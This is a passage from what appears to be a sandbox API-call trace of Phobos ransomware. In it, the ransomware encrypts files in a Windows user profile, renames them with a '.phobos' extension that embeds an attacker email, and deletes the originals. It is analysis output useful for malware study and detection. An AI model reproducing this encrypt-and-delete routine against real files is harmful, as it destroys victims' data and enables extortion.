nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.191] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.191] CloseHandle (hObject=0x124) returned 1 [0205.191] CloseHandle (hObject=0x160) returned 1 [0205.191] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url")) returned 1 [0205.192] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.394] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.394] CloseHandle (hObject=0xfc) returned 1 [0205.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url")) returned 0x20 [0205.395] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.395] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.395] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.396] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.399] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.401] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.401] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.402] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0205.402] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.402] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.403] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.403] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.403] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.403] CloseHandle (hObject=0xfc) returned 1 [0205.403] CloseHandle (hObject=0x178) returned 1 [0205.403] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url")) returned 1 [0205.404] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.425] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.425] CloseHandle (hObject=0x160) returned 1 [0205.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url")) returned 0x20 [0205.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.425] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.425] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.427] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.427] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.506] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.506] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.507] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0205.507] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.507] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0205.507] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.507] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0205.507] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.507] CloseHandle (hObject=0x160) returned 1 [0205.507] CloseHandle (hObject=0x124) returned 1 [0205.507] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url")) returned 1 [0205.508] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.513] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.513] CloseHandle (hObject=0x124) returned 1 [0205.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url")) returned 0x20 [0205.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.514] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.514] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.514] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.517] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.517] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.517] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0205.518] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.518] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.518] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.518] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.518] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.518] CloseHandle (hObject=0x124) returned 1 [0205.518] CloseHandle (hObject=0x160) returned 1 [0205.518] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url")) returned 1 [0205.519] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.542] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.542] CloseHandle (hObject=0x124) returned 1 [0205.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url")) returned 0x20 [0205.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.543] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.543] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.544] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.544] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.544] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.544] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.545] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0205.545] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.545] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.545] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.545] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.545] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.545] CloseHandle (hObject=0x124) returned 1 [0205.546] CloseHandle (hObject=0xfc) returned 1 [0205.546] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url")) returned 1 [0205.546] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.551] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=486) returned 1 [0205.551] CloseHandle (hObject=0x124) returned 1 [0205.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk")) returned 0x20 [0205.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.551] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.551] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.552] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.552] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.552] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1e6, lpOverlapped=0x0) returned 1 [0205.553] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0, dwBufLen=0x1f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0) returned 1 [0205.553] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1f0, lpOverlapped=0x0) returned 1 [0205.553] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.553] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.554] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.554] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.554] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.554] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.554] CloseHandle (hObject=0x124) returned 1 [0205.554] CloseHandle (hObject=0x178) returned 1 [0205.554] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk")) returned 1 [0205.555] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.556] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=929) returned 1 [0205.556] CloseHandle (hObject=0x178) returned 1 [0205.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk")) returned 0x20 [0205.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.556] SetFilePointerEx (in: hFile=0x178, 